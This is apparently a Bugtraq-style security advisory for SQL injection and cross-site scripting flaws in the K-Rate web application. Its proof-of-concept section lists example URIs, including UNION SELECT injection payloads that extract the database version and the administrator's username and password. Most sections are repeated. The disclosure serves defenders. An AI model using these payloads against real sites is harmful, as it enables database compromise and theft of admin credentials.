K-Rate Multiple Input Validation Vulnerabilities
BID:30842
Info
K-Rate Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 30842 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-7097 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 26 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | Corwin |
| Vulnerable: |
Turn-K K-Rate 0 |
| Not Vulnerable: | |
Discussion
K-Rate Multiple Input Validation Vulnerabilities
K-Rate is prone to multiple input-validation vulnerabilities:
- SQL-injection issues
- Cross-site scripting issues
- HTML-injection issues
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
K-Rate is prone to multiple input-validation vulnerabilities:
- SQL-injection issues
- Cross-site scripting issues
- HTML-injection issues
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
K-Rate Multiple Input Validation Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/index.php?req=online&show=1[SQL]
http://www.example.com/room/1[SQL]
http://www.example.com/index.php?req=view&user=somegirl&id=2[SQL]&act=vote&image=3&voter=12 vote=3
http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3[SQL]&voter=12&vote=3
http://www.example.com/blog/somegirl[SQL]
http://www.example.com/index.php?req=blog_edit&id=1[SQL]
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,version(),4,5,6/*
http://www.example.com/room/-1 union select 1,version(),3,4/*
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_user,4,5,6 from rate_admins where adm_id=1/*
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_pass,4,5,6 from rate_admins where adm_id=1/*
http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3&voter=12&vote=3[XSS]
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI.
The following example URIs are available:
http://www.example.com/index.php?req=online&show=1[SQL]
http://www.example.com/room/1[SQL]
http://www.example.com/index.php?req=view&user=somegirl&id=2[SQL]&act=vote&image=3&voter=12 vote=3
http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3[SQL]&voter=12&vote=3
http://www.example.com/blog/somegirl[SQL]
http://www.example.com/index.php?req=blog_edit&id=1[SQL]
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,version(),4,5,6/*
http://www.example.com/room/-1 union select 1,version(),3,4/*
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_user,4,5,6 from rate_admins where adm_id=1/*
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_pass,4,5,6 from rate_admins where adm_id=1/*
http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3&voter=12&vote=3[XSS]
Solution / Fix
K-Rate Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].